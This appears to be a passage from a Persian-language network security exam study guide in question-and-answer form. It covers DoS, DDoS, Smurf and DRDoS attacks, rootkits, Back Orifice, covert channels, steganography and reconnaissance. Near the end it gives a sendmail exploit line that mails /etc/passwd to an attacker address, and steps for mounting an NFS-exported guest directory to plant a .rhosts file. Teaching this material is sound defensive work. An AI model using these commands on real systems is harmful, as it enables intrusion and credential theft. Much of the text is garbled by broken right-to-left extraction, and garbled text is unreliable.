را آدرس ي کند زيافت نمي دريچ پاسخيجه هي باشند در نتي مي که آدرسها جعليي از آنجاي ماند وليمنتظر پاسخ م

جـه ي را ندارنـد در نت TCP/SYN-ACKافـت بـستهء ينکـه انتظـار در يا ا يـ ندارند و يا وجود خارج ي مبداء يها

ي از حافظه سـرور بـه هـدر مـ ين است که مقداري افتد ا ي که م يتنها اتفاق .دهنديافت آن انجام نم ي در قبال در يعمل

Page 28: Q&A

٢٧

گـر نتوانـد بـه ي گـردد د ي شـده و باعـث مـ اد باشد حافظه سـرور اشـباع ي ز ي قالب ين درخواستها يرود و اگر تعداد ا

). ن استيز هميکه البته هدف مهاجم ن( پاسخ دهديگريدرخواست د

ـ ه ري پايبر چه اساس) UDP Flood(Smurf Attack ،حمالت DOS حمله ياز متدها ‐۸ شـده يزي اند و نحوه عملکرد آنها چگونه است؟

ک آدرس يـ نکـه فقـط بـه ي ا يجه بسته ها بـه جـا يدر نت نشده اند و يکربندي پ ي که به خوب ييبر اساس شبکه ها

کننـد بـه تمـام يدا مـ يـ شـبکه اجـازه پ broadcastق آدرس يـ مشخص داخل شبکه فرسـتاده شـوند از طر

.شودي گفته مSmurfت کنندهء ين حالت به شبکه تقويدر ا. موجود در شبکه ارسال گردنديوترهايکامپ اسـت را بـه ي که همان آدرس قربـان ي با آدرس مبداء جعل IP ي از بسته ها يمين روش مهاجم حجم عظ يدر ا

پاسـخ بـه ي موجود در شبکه بـستها يوترهايجه آن تمام کامپ ي فرستد که در نت ي شبکه م broadcastآدرس

. شودي مي باند قرباني پهناي فرستند که باعث مصرف نا بجاي ميآدرس قربان

ـ سـه ال ي شـود؟معمار ي گفته م ي نوع حمالت به چه DDOSستم حمالت يت س ي در مبحث امن ‐۹ ه و ي ست؟ي در چيمون و زامبيتفاوت د.دييم نماين نوع حمالت را ترسيهء ايچهار ال

ن يـ در ا . گردنـد يوتر مختلف ارسـال مـ يا هزاران کامپ ي مربوط به حمله از صدها ين نوع حمالت بسته ها يدر ا

ــاجم ســع ــيحمــالت مه ــد از ماشــي م ــي اي کــه رويينهاي کن ــستندنترن ــايکام(ت ه ،سرورها، ي شخــصيوتره

.دي حمله به هدف خود استفاده نمايبرا...)ابهايريمس : ه ي سه اليمعمار

مهاجم

ديمون ديمون ديمون ديمون

قرباني

Page 29: Q&A

٢٨

:هي چهار اليمعمار

آلوده به يوترهايد و کامپ با آن ندار يگر ارتباط ي نسب کرد د يوتري کامپ يمون را بر رو ينکه د يمهاجم بعد از ا

تـا حملـه بـه هـدف را آغـز ) يگر زمان يمثال تر ( هستن يداد خاص ي شروع به حمله منتظر رو يمون معموال برا يد

ه حملـه کننـده بـا يـ چهـار ال ي در معمـار يولـ ) ن شـده اسـت يـي در واقع هدف و زمـان حملـه از قبـل تع (کنند

تواند خود دستور و هدف حمله را در زمان ياط دارد و م ق سرگروهها ارتب ي از طر ي آلوده به زامب يوترهايکامپ

.دين نماييدلخاه تع

ـ چهـار ال يمعمـار (DDOS حمله به روش يچند نمونه روشها و ابزارها ‐۱۰ را نـام بـرده و ) هي .ن ابزارها از چه نظر با هم تفاوت دارندي ايد که در حالت کلييبگو

Torinoo,TFN,TFN2K,Shaft,DDNFS… ن سرگروهها ين مهاجم و سرگروهها و ارتباط ب ي ارتباط ب ي که برا يشتر از نظر پروتکل و پورت يزارها ب ن روشها و اب يا

. کنند با هم تفاوت دارندي مه ها استفاديو زامب

شود؟ي گفته مي به چه نوع حمالتDRDOSستم حمالت يت سيدر مبحث امن ‐۱۱

ل يــاز قب(يس دهنــدگان قـانون ياز سـرو هـستند در آن DDOS از حمــالت يديـ ن نـوع حمــالت نـوع جد يـ ا

يعنــي. شــودي اســتفاده مــي جعلــي مــنعکس کــردن بــسته هــايبــرا...) ابهايريا مــسيــس دهنــدگان وب يســرو

بـا request ي بفرسـتند بـستها يما به سمت قربـان ي را مستق ي جعل ينکه بسته ها ي ا ي به جا ي زامب يوترهايکامپ

. فرستندي مي به سروس دهندگان قانونيآدرس قربان

۱۲‐Secure Overlay Serviceست و چگونه مانع از حمالت ي چDOSشود؟ي م

مهاجم مهاجم

زامبي زامبي

زامبي زامبي

قرباني

سرگروه سرگروه سرگروه

Page 30: Q&A

٢٩

را DOSه امن حمالت از نـوع يک ال ي در پشت يس دهنده اصل ي کوشد با پنهان کردن سرو يس م ين سرو يا

افتـد ي هـم از کـار ب يس دهنـده اصـل يان راه سـرو يـ م ي از نـود هـا يکـ ي اگـر ين صورت حت يدر ا . سازد يخنث

که ي شده درصورتيابي ارزي ها packetو . خواهند بود يريگي قابل پيگرير دياز مسدرخواست ها

. شوندير مي سرازيه به سمت هدف اصلي مطمئن اليق نود هاي شدند به از طرييسالم شناسا

. شودي انجام مchordتم يه توسط الگوري درون اليابير يمس شوديظت منگ محافيلترين ساده في قوانيک سريستم هدف با يس SOAP: Secure Overlay Access Point BEACON: The end point ارتباط دارديي که با هدف نهايگره ا

SOS

شود ؟يم ميست؟ به چند بخش تقسيستم چي سي حمالت از کار اندازيت اصلي مز‐۱۳ باشـد ي انجـام مـ بـاال قابـل ينـه هـا يستم معموال آسان به سرعت وبـدون صـرف هز ي س يحمالت از کار انداز

يم مـ يوکال به دو قـسمت تقـس . برد يار باال ميت ومخاطره حاصل از آنها را از لحاظ جنگ اطالعات بس يواهم

:شود

: س ي از سرويري حمالت جلوگ

ه يس پاي از سرويري حمالت جلوگ

ع شده يس توزي از سرويري حمالت جلوگ

ي انعکاسع شدهيس توزي از سرويري حمالت جلوگ

: مخرب يو برنامه ها

)روس ها وکرم ها که از همه مهمترنديو(ها وي تراوا باکتري اسب هاي منطقيچه بمبهاي در

Page 31: Q&A

٣٠

يده م ين هدف رس يست ؟ وچطور به ا يه چ يس پا ي از سرو يري انجام حمالت جلوگ ي هدف تفوذ ‐۱۴ کند؟يشود ؟ وچطور کار خود را شروع م

ي م ي سع ين حمالت نفوذ ي به عمل آورد در ا يريس خاص جلوگ يک سرو ي از ينونهدف استفاده کاربران قا

ش از حد استفاده کنـد ياز پردازنده ب , باند شبکه را مصرف کند ياندازد ؛ همه پهنا يس را از کار ب يکند تا سرو

. شوديک پردازه خود کار شروع مين حمال ت اغلب توسط يسک را پر کند واي ديا فضاي

د؟يح دهيه را توضيس پاي از سرويري حمالت جلوگ انواع‐۱۵ر اسـت يد نـا پـذ يـ ا تجديـ محدود , اب يوترها وشبکه ها از منابع کمي÷ محروم کردن کاميک نوع حمله در پ ي

باند شبکه يپهنا, حافظه , سک ي ديضا,مثل زمان پردازنده

دهد ير مييا آنها را تغي کند ي را خراب ميکربنديگر از حمله اطالعات پينوع د

ي مناسب يکيزيت ف ي است که امن ين نوع حمله ضرور ي شبکه در مقابل ا ي اجزا يکيزين نوع به صورت ف يآخر

.وجود داشته باشد

د؟يح دهيس را توضي از سرويريز کردن بافرها در حمالت جلوگي روش سرر‐۱۶نکه بـسته هـا بـه يل اي کند به دليسال م اري را به قربانipک بسته بزرگتر از طول اجازه داده شده در پروتکل ي

يق شـبکه عبـور کننـد وبـه مجـرد همگـذار ي تواند از طر ين م ي شوند بنا برا يم م ي تقس يهنگام ارسال به قگعات

يزبـان مقـصد مـ ي شوند که باعث از کار افتـادن م يز م ي سرر يتي ب ۱۶ ي داخل يرهايمجدد قطعات در مقصد متغ

کروسافت است که امکان سوط استفاده را ي ما iis در يميب قد يک ع يفر ز با ي از سرر يگريک مثال د يا يشود

افـت ي کند وبـه محـض در يت وب درخواست ميايک ي از ي طوالنيلي خ urlک ي ي کند که نفوذيفراهم م

. شوديس متوقف مي مشاهده وسرويابي دستي تخطيدرخواست خطا

شود ؟ ير مي باند امکان پذيا مصرف پهنيس جه موقعي از سرويري در حمالت جلو گ‐۱۷ .دا کند ي دست پي باند قربانيشتر از پهناي باند بي بتواند به پهناي که نفوذيدر صورت

کنند مشکل است؟ي باند شبکه استفاده مي که از روش مصرف پهنايب نفوذگراني چرا تعق‐۱۸ smurfن حمله حمله ين انواع ايداولترن حمالت امکان جعل آدرس مبدا بسته ها وجود دارد که متيرا در ايز

باشد ي م

ـ ي رخ م يست ودر چه موقع يمه باز چ ي اتصال ن ‐۱۹ توانـد از آن اسـتفاده ي دهد ؟ وچطور نفوذگر م کند؟ي

افت نکند ي در ackام ي فرستد اما هرگز پي م syn/ackام يس دهنده پي دهد که سروي مي رويهنگام

ي مـ ي کند ودر آن اطالعات مربوط به اتصاالت در حال وقوع را نگهـدار يمجاد ي را ا يستم ساختار دادها يس

ز کرد ي تواند آن را سرريمه باز مياد اتصال نيد زي باشد با تولي اندازه محدود مين ساختار دارايکند وچون ا

Page 32: Q&A

٣١

ـ ک آدرس واحد يق ي که از طر يزان بسته ها ي نظارت بر م ي ک ‐۲۰ ـ ا ي ـ ي نـد ي آ يک شـبکه واحـد م باشد؟ وچرا؟ يجواب گو نم

زبان مختلـف يا صدها م ي مربوط به حمله از ده ها يع شده چون بسته ها يس توز ي از سرو يريدرحمالت جلوگ

نترنـت در حملـه اسـتفاده ي در سرتاسـر ا ين ها ي کند از ماش ي م ي سع ين حمالت نفوذ يدر ا , شوند يارسال م

.کند

د؟يح دهي را توض DDOS مدل شبکه ‐۲۱ن سـرگروه هـا هـم يـ کننـد هـر کـدام از ا ي سـرگروه را کنتـرل مـ يا چند حمله کننـده تعـداد يک ين مدل ي در ا

ن ســرگروه هــا يز بــيــگروه هــا ونن حملــه کننــده وســريارتبــاط بــ. کنــد ي از کــارگزاران را کنتــرل مــي بزرگــيگروهــ

. شوديل آسا رجوع ميک سي به عنوان ترافين کارگزاران وقرباني وارتباط بيک کنترليوکارگزاران به عنوان تراف

؟ يابي از هر گونه رديري جلوگي کند براي چه کار مDDOS حمله کننده در مدل ‐۲۲ کـه در هنگـام ي کند و دراغلـب پروتکلـ يخودش وارد م و ي قربان يزبانهاين م ي ب ي اضاف يه ها يحمله کننده ال

ن حملـه کننـدگان ي ارتبـاط بـ ي کـه بـرا ي شـود بـا پروتکلـ ين سرگروه هـا وکـارگزاران اسـتفاده مـ يارتباط ب

. باشد يوسرکروه ها متفاوت م

د؟يح دهيع شده را توضي توزيس انعکاسي از سرويري مراحل حمالت جلوگ‐۲۳ستم يـ س ي تعـداد ين مرحلـه نفـوذ ي در ا DDOS مشابه با حمله يلين مرحله خ يد آول باش يشامل سه مرحله م

کند ي آن نصب مي حمله روي کند وابزارهايدا مينترنت پي اير رويب پذيآس

س دهندگان ي به عنوان آدرس مبدا به سرو ي با آدرس قربان يک جعل ي خواهد تا تراف ي ها م يمرحله دوم از زامب

ارسال کنند يقانون

ارسـال يک پاسخ را به قربان ي شوند تراف يده م ي که منعکس کننده نام يس دهندگان قانون ير مرحله سوم سرو د

. کنند

Page 33: Q&A

٣٢

فصل ششم مواضعت يتثب

ست ؟ي ها چback door و trojan horse با rootkit تفاوت ‐۱

Rootkitه يار شبي بسي هستند که از نظر ساختاريي ها برنامه هاTrojan horse ها و backdoor هـا

عـالوه rootkitرا يـ است ز ي پشت يار مشکل تر از درها ي بس rootkit يين تفاوت که شناسا ي با ا يهستند ول

بـر sub7 مثـل ي در پـشت ي و ابزارهـا netcat، مثـل شـنونده ي خارج يک برنامه کاربرد ينکه به عنوان يبر ا

ن خـود يگزي مواقع جايعامل و گاه ستم ي مهم س يي اجرا ين برنامه ها يگزي شوند بلکه جا يستم اجرا م ي س يرو

ستم يـ و پنهان شدن در عمق س يق درب پشت ي دهند که از طر ين اجازه را م ي شوند و به هکرها ا يهسته کرنل م

نـگ، يتوري مانيگـر برنامـه هـا ي و د(sniffer)اب هـا يـ بـا نـصب رد ياديـ عامل به آن نفوذ کننـد و مـدت ز

را مــثال بــه پوشــه يليشه فــايــ تــروا هميکــه اســب هــايحالدر .از دارنــد بــه دســت آورنــديــ را کــه نياطالعــات

system32کنندي اضافه م .

.ديان کني آنها را بي هايژگي ها و وrootkit انواع ‐۲Rootkit - ن ي اول):سطح کاربرد(ي سنتrootkit ک دهـه يـ و در طـول ۱۹۹۰ در ي قدرتمند سـنت

ستم ي دهند س ي خودشان نصب شده و به هکر اجازه م ي به طور عمل rootkitدا کرد، امروزه انواع يگسترش پ

به طور ي مختلف نوشته شده اند ول يستم عامل ها ي س ي برا ي سنت ي ها rootkit. را به سرعت فتح کنند يقربان

ل تمرکـز يـ ن قب يـ و از ا SunOS-Solaris-Linux-AIX-HP-UX مثـل unix يستم هـا ي بر س يسنت

ن يگزي نوشـته شـده انـد کـه جـا يي هـا rootkitز يـ نNT/2000 سـرور مثـل يندوزهاي ويبرا. کرده اند

ا يـ root ي هـا اجـازه دسترسـ Rootkit. دهنـد ير مـ ييـ ستم را تغيا سي شده و (dll)ايوند پو ي پ يکتابخانه ها

administrator يم کـه دسترسـ يستم هـست يـ سي قادر به نصب آن هـا بـر رو ي دهند و هنگام ي را به ما نم

root ايــ administratorگــر مثــل ي دي روش هــارا ازbuffer overflow بــه دســت آورده

Page 34: Q&A

٣٣

و پنهـان (back door)يک درب پـشت يـ ياده سـاز يـ هـستند کـه بـا پ ييها ابزارهاrootkitن يبنابرا.ميباش

ــroot ســطح ي دسترســيستم و ردپاهــا اجــازه نگهــداريــکــردن مــدارک اســتفاده از س ــر . دهــدي را م اکث

rootkit ل مثـ يـي س ها و برنامه ها يها سروDU-Find-Ifconfig-Login-ls-Netstate-ps را بـا

rootkitک يـ بـا يستميـ سيک از برنامه هايهر . کنندي خود جابجا مTrojan horse منحـصر بـه فـرد

ر ين برنامـه هـا مثـل چـشم و گـوش مـد يهمه ا . است يک برنامه عاد يه ي شود که عملکرد آن شب ين م يگزيجا

در حال اجرا هستند هکرهـا بـا بـستن چـشم و ييس هايل ها و سروي کنند چه فاين م يي باشند که تع يستم م يس

ک يـ حـضورشان را در ي تواننـد بـه طـور مـوثر يشود مـ يـ انجام م rootkitستم که توسط يران س يگوش مد

. نگه دارنديستم مخفيس

‐ rootkit اتر ار فر ي بس ي تر هستند و از نظر پنهان ساز يار حرفه ا ي نسبت به سطح کاربرد بس : سطح هسته

و کنتـرل آن يين کار شناسـا ي شوند و ا ي م ياده ساز يشه پ يرا در سطح ر ي سطح کاربرد هستند ز rootkitاز

ک امکـان قدرتمنـد يـ يستم اصل ي از س ي سطح هسته به ما کنترل کامل rootkit. کنديار مشکل تر م يها را بس

ک سـطح يـ ستم را در ي تواند، سي در سطح هسته م يرات اساس ييجاد تغ يک هکر با ا ي. دهد ي م يريگي جا يبرا

. ن به دست آوردي و پنهان شدن در ماشي به درب پشتي دسترسي برا يادي کنترل کرده و قدرت ز يار اساس يبس

شود و يـ مTrojan horseک يـ ل به ي رسد تبديبا و کارآمد به نظر ميک کرنل زي که يخود هسته در حال

سـطح rootkitک يـ کـه يدر حـال . مانـد يخبـر مـ يستم از آن بـ ي که کرنل فاسد شده صاحب س يدر حال

سـطح هـسته rootkitک ي شود، ي م .…-ls-Ifconfig مثل ياتي ح يستمي س ين برنامه ها يگزيکاربرد جا

ي شـبکه ا يت ها يل ها، دستورها، پردازش ها و فعال ي فا يتمام. دهد ير م ييا آن را تغ ي شود ين هسته م يگزيجا

. شوديشده و به نفع هکر ضبط م سطح هسته پنهان rootkitآلوده به

.دي آن بزني کردن در سطح کاربرد و چگونگrootkitک مثال از ي ‐۳

ل ين فا ي کند و ا ي اضافه م system32 را در پوشه يلين صورت است که فا ي ها به ا Trojan ساختار کار

اجـازه ورود يکـردن پـورت ا با بـاز ي فرستد ي هکر م يرد و برا ي گ ي م log ي قربان ي ها passwordه ياز کل

ستم اضافه کنند ي را به هسته س يلينکه فا ي ا ي به جا ي سنت ي ها rootkit ي دهد ول يهکر را از پورت باز شده م

مخـرب ياتيـ افتـه آن کـه عمل ير ييـ ک نسخه تغي را با يستم عامل قرباني و مهم سي اصليل هايس ها و فا يسرو

ــ ــام م ــا يانج ــد ج ــيگزي ده ــرا ين م ــد ب ــال ي کن ــاrootkit مث ــروف سي ه ــ مع ــل ي ــه unixستم عام برنام

/bin/login در يتي امن ين ابزارها ي تر ي از اساس يکي که unix افتـه کـه شـامل ير ييـ است را بـا نـسخه تغ

از unix ي هـا ستميـ س. کنـد ي باشـد عـوض مـ ي مـ root سـطح ي دسترس ي برا يک کلمه عبور درب پشت ي

/bin/login و تست ي جمع آور ي برا userID کنند يه م ها استفاد ./bin/loin شناسـه کـاربر را بـا

اگر هکـر از پـسورد درب . ن کند يي کند تا صحت آن را تع يسه م ي پسورد مقا يل ها يپ شده را با فا يپسورد تا

ر ي اگـر مـد ي دهـد، حتـ يستم را مـ يـ به س يافته اجازه دسترس ير يي تغ bin/login/ استفاده کند برنامه يپشت

. ستم وارد شـود يـ بـه س يشه درب پشتي تواند با پسورد ريند هکر هنوز م شه را عوض ک ي ر يستم پسورد اصل يس

دور زدن کنتـرل يتوانـد بـرا يرا مي است زيک درب پشتي rootkit، /bin/loginن يک روتين يبنابرا

را فقـط چهـره آن يـ هم هست ز Trojanک يعالوه بر آن . رديستم مورد استفاده قرار گ ي نرمال س يتي امن يها

. استback doorک ي در اصل ي است ولloginبا و نرمال يک برنامه زي

Page 35: Q&A

٣٤

ها سطح هسته و سطح کاربرد به چه صورت است؟rootkit مقابله با ي راه ها‐۴ک هکـر يـ . ر اسـت ي بـه حـساب مـد ي ها اجازه ندادن هکرها به دسترس rootkitن راه دفاع در برابر ي مهمتر

ستم يـ د فـوذ بـه س ي جديشه راه هايم همي باشد، اگر بتوانشه داشتهي سطح ريد دسترسي باrootkit نصب يبرا

اگر بر اسـاس . رسدير به صفر مي هکر به حساب مديابيم، شانس دستين ببريم و از ب ي کن ييعامل مان را شناسا

ص اسـتفاده از دسـتور ي تـشخ ي از راه هـا يکي نصب کند rootkitستم ي س ي ما هکر توانست رو ياطي احت يب

echo از يتعداد کم. است rootkit ها دستور echoها است را تـروا يرکتوريست کردن داي لي را که برا

ات يـ از محتو يست قـانون يـ ک ل يـ echoل يـ ن دل يبـه همـ . کننـد ي تمرکـز مـ ls دستور يشتر رو ي کنند وب يم

پنهـان شـده و يلين اسـت کـه فـا يـ جه ا ي متفاوت باشد نت echo و lsجه ياگر نت . گرداند ي را بر م يرکتوريدا

شناخته ي ها rootkitکند که يز هست که مشخص م ي آنال ي هم برا ييابزارها. شده rootkitستم يحتماال س ا

است که به ي قو يتاليجين راه دفاع استفاده از اثر انگشت د يدر کل بهتر . ا نه يستم نصب شده ي س ي رو يشده ا

سـطح هـسته ي هـا rootkitن در يهمچنـ . ق کنـد يـ ستم را تحق ي س ي بحران يل ها ي فا ي درست يصورت دوره ا

scan مثل يي پورت ها در شبکه که با استفاده از ابزارها Nmap شبکه را که شنونده هـستند را ي پورت ها

rootkit از ي نشان دادن رد يستم برا ي س ي دوره ا scanل ين دل ي دهد، به هم يستم نشان م ي س يتير امن يبه مد

ستم يـ ن راه فرمـت هـسته و نـصب مجـدد س يه شد بهتـر آلود rootkitستم به يدر کل اگر س . د است يار مف يبس

.عامل است

توسط هكر چيست ؟" از بين بردن رد پا ها " هدف از ‐۵

براي نفوذ بيشتر هكر بايستي از اطالع مسئوالن سيستم هدف ، از وجود خود جلوگيري كند به همين دليل رد

.پاهاي خود را از بين مي برد

۶‐ log؟ ديح دهي شود ؟ توضيزچگونه انجام مندوي در ويري گ

و يتي ، امنيستمي سينه يستم در سه زمي وجود دارد که از اتفاقات س event log به نام يسي سروندوزيدر و

و system.log يل هـا يـ ب در فايـ ج را بـه ترت ي کنـد و نتـا ي مـ يريـ گ log ي کـاربرد ينـرم افـزار هـا

security.log و application.logکند ي مرهي ذخ .

.ديح دهيست؟به طور مختصر توضين بردن رد پاها چي از بي هکرها برايروشها ‐٧

مورد نظر که ي ها log ي ثبت رخداد تمام يل ها ي فا يهکر با دستکار : ثبت رخداد يل ها ي فا يدستکار.۱

. داردري مدياز به سطح دسترسين کار هکر ني اي کند، برايش ميرايستم گرفته شده را وياز س

جـاد يستم ا يـ س ي کـه رو ييا فهرست هـا يل ها ي فا ييد با ترفندها يهکر با : ل ها و فهرست ها ي کردن فا يمخف.۲

. کنديکرده را مخف

يد اقـدام بـه مخفـ يـ ر نفـوذگر با يا مـد ي توسط کاربر يي از شناسا يريشگيبه منظور پ : ندهاي کردن فرآ يمخف.۳

ي رود به صـورت يش پروسه ها به کار م ي که جهت نما ييارها که نرم افز ي خود کند به نحو يکردن پروسه ها

. نفوذگر را نشان ندهدير کنند که پروسه هاييتغ

Page 36: Q&A

٣٥

ق کانـال نهـان ياز طر. آشکار استيک کانال ارتباطيک ارتباط نهان در بستر يکانال نهان : نهان يکانال ها .۴

تماس گرفته و دسـتورات خـود را بـر ين قرباني با ماشيا درب پشتي Trojan horse ياده سازينفوذگر با پ

.کندياده ميآن پ

۸‐ Back orificeت است؟يرند و شامل چه قابلي گي قرار مي کاربردي از برنامه هاي در چه سطح Backorifice رنده يس گيرنده است که به نرم افزار سرويس گيسرو/س دهنده ي سرويک برنامه کاربردي

ي کـه در حـال اجـرا يني ماشـ ي و شبکه را بـر رو ير اعمال چند رسانه اگي ديت و اجرايرياجازه نظارت ،مد يم بـسته هـا ي تـوان ي اسـت مـثال مـ يديـ مف ين هـا ين برنامـه شـامل پالگـ يـ ا. دهـد يس دهنده اسـت ،مـ يسرو

س دهنده بـه ي شود و سرو يار محرمانه م يدو کار بس يافت کن يج را در يدستورات خود را ارسال و نتا ICMPبا

کنـد يده رمز ميچي که دارد تمام بسته ها را به صورت کامال پيگرين ديا مثال با پالگ ي.د ده ي گوش نم يپورت

. شودياد ميها زIDSو امکان فرار از دست

دارد ؟ييت هاي کند و چه مزيکار م)user‐هسته (يدر چه سطحKnark ابزار ‐۹

البته (ن ابزار يبا استفاده از ا . کند ي م تي باشد و در سطح هسته فعال يها م Rootkitن ابزار در واقع در رده ي ا ‐

کـردن يل و شـاخه هـا ،مخفـ يـ فا يارات ،پنهـان سـاز يـ ش اخت ي همچون افزا ي تواند به کار ها يم)linuxدر

پنهان کردن ماژول ي و حت يي اجرا يت فرمان ها ير هو يي در حال اجرا،پنهان کردن اتصال شبکه ؛تغ يپروسه ها

knark. افتيدست.

برد ؟ي از آن ميست و هکر چه استفاده اي چ کانال نهان‐۱۰

باشد که هکر بـا اسـتفاده از ي مجاز م ير مجاز به صورت پنهان شده در بسته ها ي غ يکانال نهان ارسال بسته ها

درون شبکه به دست آورده و شروع به سوء يک عامل نفوذي يک درب پشتيا يک اسب تراوا ي يآن با اجرا

. کند ياستفاده از آن م

ست؟ي کانال نهان چياي مزا‐١١

واره يـ د ي کـه بـرا ين در قـالب ي فرام ين قربان يس دهنده بر ماش يک سرو يبا نصب : آتش يواره ي عبور از د ‐

ب ارتبـاط يـ ن ترتيوتر نفوذگر دارد به ايجاد ارتباط با کامپ ي در ا ي قرار گرفته و سع httpآتش مجاز باشد مثل

... کنديريجاد آن جلوگي تواند ا ز ايره آتش نمواي شود و دياز داخل شبکه آغاز م

تـوان ي شـبکه مـ يک پروتکـل مجـاز بـرا ي يجاد کانال نهان بر رو يبا ا : ص نفوذ ي تشخ يستم ها يز از س ي گر ‐

ستم يـ نکـه س ي نمـود بـدون ا يا درب پـشت يـ اسب تـروا ير اطالعات کنترل ير مجاز نظ ياقدام به عبور اطالعات غ

.ديص نفوذ آن را کشف نمايتشخ

تـوان يواره آتـش مـ يـ د يتـ يستم امن يـ بـا دور زدن س : محافظت شـده ياز شبکه / انتقال اطالعات حساب به ‐

تروا را به شبکه جهت نـصب بـر ير اسب ها ي نظ يي اجرا يا برنامه ها ياطالعات حساس را از شبکه خارج کرد

.ستم ها وارد کرديس

Page 37: Q&A

٣٦

ست؟ي نهان چيجاد کانال هاي اي روشها‐١٢ IPند يلد سر آيه از فبا استفاد • TCP از sequence numberلد يبا استفاده از ف •

TCP از acknwledgement numberلد يبا استفاده از ف •

ICMPبا استفاده از پروتکل • FTP و HTTPبا استفاده از پروتکل •

telnetبا استفاده از • SMTPبا استفاده از پروتکل •

Page 38: Q&A

٣٧

)نارهايسم (يجانبموضوعات

داده هايپنهان ساز )الف ۱ .steganography دارد؟ي با رمز نگاريت و چه تفاوتيچس

steganography ک يـ در ينست که داده ها را به گونـه ا يهدف ان ا . داده در داده است ي هنر پنهان ساز

ي متوجه وجود آن نشود و اصال شک نکند که ممکن است اطالعات يک عکس پنهان کند که کس يبستر مانند

م که قابل خواندن نباشد و تنهـا بـا ي ده ير شکل م يي تغ يه را به گونه ا داد يدر رمزنگار .ن بستر پنهان باشد يدر ا

وقـت ي بـه انـدازه کـاف يست و اگر کـس ي وجود داده پنهان ن يدر رمزنگار .ر بتوان آن را خواند ييبرگرداندن تغ

ي رمزنگـار ي بـرا ينيگزي جـا steganographyد گفـت يـ البتـه با .د يد بتواند رمز را بگشا يصرف کند شا

. توان از انها در کنار هم استفاده کرديمست و ين

:ديح کني از انها را تشريکيد و ي رانام برsteganography digital مختلف يروشها.۲ ي هـا يا بازيت ها و يوب سا , IPو TCP يهدر ها , ي صوتيل هايبا استفاده از فا ,با استفاده از عکس

ن ي در حـ mp3 کـردن داده هـم وجـود دارد مـثال در فرمـت باشد امکان پنهـان ي خال يهر جا فضا . يتاليجيد

بـا فرمـت ييا در عکـس هـا يـ . شـود ي پنهـان کـردن داده اسـتفاده مـ ي برا ي خال ي صوت از فضا يفشرده ساز

bitmap شود ي سبز مشخص ميگري قرمز وديکي ي ابي برايکيت يکسل با سه باي چون رنگ هر پ

ن به احتمال يک است بنابر ايا يا صفر يت ين بيه داده استفاده کرد اري ذخيت اخر هر رنگ براي توان از بيم

. ندارديتي ب۸ در رنگ يرين خطا چندان تاثيم که ايت اخر رنگ خطا کرده ايدر ب% ۵۰

Page 39: Q&A

٣٨

اطالعات استفاده کرد؟ي پنهان سازي برايوتري شطرنج کامپي توان از بازيبه نظر شما چگونه م.۳هر خانه و هر حرکـت بـسته بـه ,ل شده هر مهره ي مهره تشکي خانه و تعداديعدادک صفحه با تي از ين بازيا

خـاص ييرهايک برنامه و متغ ي از ي باز ياده ساز ي پ ي باشد به عالوه برا يتواند نماد خاص ين م ين طرف يقرارداد ب

کننـد کـه ي بـاز ي توانند به گونـه ا ي مي از آنها و مذاکرات قبل يرنده با آگاه ياستفاده شده است فرستنده و گ

. را رد و بدل کننديام خاصيپ

!تيق شکستن امنيت از طريارتقاء امن) ب ست؟يفاز اول حمله چ ‐۴

م از نقاط ضـعف ي توان يم بهتر م ي بدست اور يشتريهر چه اطالعات ب . اطالعات است يفاز اول حمله جمع اور

نکه يا اي دارند يي هايتم هستند و چه دسترسسي در سيم چه کاربرانيد بفهميمثال با. ميسواستفاده کن

. در شبکه به اشراک گذاشته شده استيا چه اطالعاتي در شبکه وجود دارد ييس هايچه سرو

homeدي شوي متوجه مrusersبا کمک دستور .دي را دارvictim.comد قصد حمله به يفرض کن ‐۵directory کاربر guest در /export/foo کسب اطالعـات ي برايبه نظر شما قدم بعد. قرار دارد

از ( د؟ي کن ي م يشنهادي را پ يست ؟ در صورت ممکن بودن حمله چه راه ي امکان نفوذ چ يشترو بررس يب )دينوکس استفاده کنيدستورات ل

اگـر .انـد شـده mount در شـبکه يي هـا يرکتـور يم که چه دايني بيم show mountبا استفاده از دستور

يم کـه معمـوال بـرا ي کنـ ي ان نگاه مي شده باشد به سطح دسترسfoo , mount/ا ي export/ يرکتوريدا

ان را mountن طور بود با دستورياگرا. استي همه قابل دسترسي براhome يرکتوريکاربر مهمان دا

mountل يم و در فاي کني م.rhostsمي کنيجاد ميرات دلخواه را ايي ان تغ

نوکس چگونه از يک سرور ل ي باز کند؟ در ي راه نفوذ ftpنه ممکن است ست؟ چگو ي چ ftpس يسرو ‐۶ د؟ي شويس با خبر مين سرويوجود ا

بـه اشـتراک ي هـا يرکتـور يس امکان جستجو در داين سرويل است ايس اشتراک فايک سروي ftpس يسرو

ــراز صـــالح ــاربرن احـ ــه کـ ــته شـــده را بـ ــيگذاشـ ــه ايت شـــده مـ ــ دهـــد البتـ ــرويـ ــاربران ين سـ ــه کـ س بـ

)(anonymousمگمنا

م نـشود ممکـن ي تنظـ يا حـق دسترسـ يت انجام نشود و ي احراز هو ياگر به درست . دهد ي م ي دسترس يهم تا حد

.س استين سرويست کاربران وجود داشته باشد نشاندهنده وجود اي در لftpاگر کاربر .ر شودياست نفوذپذ

.مي فهمين را مي اrusersبا دستور

ندارد؟يروزه کاربرد چندانست؟ چرا امي چtftpس يسرو ‐۷trial ftp مانند ftp س يک سرويfile sharingن تفـاوت کـه امکـان يـ است با اauthentication

Page 40: Q&A

٣٩

ار نـامطمئن اسـت امـروزه ي بـس يتـ ي دهد وچون از نظر امن ي نا محدود م يندارد و به تمام کاربران اجازه دسترس

. ندارديکاربرد چندان

شد در هنگـام ين بود که م ينوکس وجود داشت ا ي ل يمي قد ينسخه ها که در يي از باگ ها يکي ‐۸شـما بـه . را نوشـت ي به خـصوص shellرنده دستور يا گ يلد فرستنده ي ف يبه جا , ل يميک ا يفرستادن

د؟ ي کنين باگ سواستفاده ميک نفوذگر چگونه از ايعنوان :ميسي نويدستور را من ي ادرس مبدا اي باشد به جاpasswdل ياگرهدفمان بدست اوردن فا

mail from: "| /bin/mail/ [email protected] </etc/passwd" ــرا ــ يو ان را بـ ــدف مـ ــتي هـ ــاال کافي فرسـ ــم حـ ــان يـ ــر بمـ ــا فايست منتظـ ــم تـ ــراpasswdل يـ ــا ي بـ مـ

)[email protected]( فرستاده شود.

)ISMS(ت يت امنيري مدستميس) ج .ديح دهي شود؟ توضيم مي تقسيي شبکه،شبکه سازمان به چه بخشهايتي مخاطرات امني از نظر بررس‐۹

. دو بخش

ار کـاربران داخـل سـازمان و يـ سها و خـدمات خـود را در اخت يـ سازمان است کـه سرو يشبکه داخل •

